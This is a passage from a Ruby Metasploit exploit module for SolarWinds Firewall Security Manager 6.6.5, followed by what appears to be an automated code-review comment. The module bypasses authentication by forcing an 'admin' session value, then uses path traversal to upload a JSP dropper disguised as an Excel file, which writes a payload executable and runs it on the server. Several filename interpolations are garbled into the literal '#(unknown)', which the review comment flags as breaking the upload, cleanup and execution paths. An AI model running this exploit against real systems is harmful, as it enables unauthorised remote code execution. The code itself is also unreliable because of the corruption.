['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip']
],
'DefaultOptions' =>
{
'RPORT' => 48080 # Could be 8080 too
},
'Platform' => 'win',
'Targets' =>
[
['Solarwinds Firewall Security Manager 6.6.5', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 13 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/'])
], self.class)
end
# Returns a checkcode that indicates whether the target is FSM or not
def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp'))
if res && res.body =~ /SolarWinds FSM Change Advisor/i
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
# Exploit/run command
def exploit
unless check == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager')
end
# Stage 1 of the attack
# 'admin' is there by default and you can't delete it
username = 'admin'
print_status("Auth bypass: Putting session value: username=#{username}")
sid = put_session_value(username)
print_status("Your SID is: #{sid}")
# Stage 2 of the attack
exe = generate_payload_exe(code: payload.encoded)
filename = "#{Rex::Text.rand_text_alpha(5)}.jsp"
# Because when we get a shell, we will be at:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
# So we have to adjust this filename in order to delete the file
register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#(unknown)")
malicious_file = get_jsp_payload(exe, filename)
print_status("Uploading file: #(unknown) (#{exe.length} bytes)")
upload_exec(sid, filename, malicious_file)
end
private
# Returns a write-stager
# I grabbed this from Juan's sonicwall_gms_uploaded.rb module
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
# Returns JSP that executes stuff
# This is also from Juan's sonicwall_gms_uploaded.rb module
def jsp_execute_command(command)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|try {\n|
jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
jspraw << %Q|} catch (IOException ioe) { }\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
# Returns a JSP payload
def get_jsp_payload(exe, output_file)
jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file)
end
# Creates an arbitrary username by abusing the server's unsafe use of session.putValue
def put_session_value(value)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'),
'method' => 'GET',
'vars_get' => { 'username' => value }
)
unless res
fail_with(Failure::Unknown, 'The connection timed out while setting the session value.')
end
get_sid(res)
end
# Returns the session ID
def get_sid(res)
cookies = res.get_cookies
sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
sid
end
# Uploads a malicious file and then execute it
def upload_exec(sid, filename, malicious_file)
res = upload_file(sid, filename, malicious_file)
if !res
fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.')
elsif res.body.include?('java.lang.NoClassDefFoundError')
print_status('Payload being treated as XLS, indicates a successful upload.')
else
print_status('Unsure of a successful upload.')
end
print_status('Attempting to execute the payload.')
exec_file(sid, filename)
end
# Uploads a malicious file
# By default, the file will be saved at the following location:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\
def upload_file(sid, filename, malicious_file)
# Put our payload in:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\
filename = "../../jsp/#(unknown)"
mime_data = Rex::MIME::Message.new
mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#(unknown)\"")
mime_data.add_part('uploadFile', nil, nil, 'name="action"')
proto = ssl ? 'https' : 'http'
ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}"
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'),
'method' => 'POST',
'vars_get' => { 'action' => 'uploadFile' },
'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",
'data' => mime_data.to_s,
'cookie' => sid,
'headers' => { 'Referer' => ref }
)
end
# Executes the malicious file and get code execution
# We will be at this location:
# C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice
def exec_file(sid, filename)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'fsm', filename)
)
end
# Overrides the original print_status so we make sure we print the rhost and port
def print_status(msg)
super("#{rhost}:#{rport} - #{msg}")
end
end
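
Review bot: four lines contain the literal text '#(unknown)' where a Ruby interpolation of filename is clearly intended: the register_files_for_cleanup path, the 'Uploading file:' status line, and in upload_file both the reassigned filename = "../../jsp/#(unknown)" and the filename="..." part of the multipart header. As committed these evaluate to the literal string, so the cleanup path, the uploaded name and the later exec_file request (which uses the original filename) do not refer to the same file; this looks like corruption on the way into the repository and should be checked against the upstream pull request. Smaller points: upload_file shadows its filename parameter, so the caller's value is lost inside that method, and exec_file discards the response, so a failed execution is never reported.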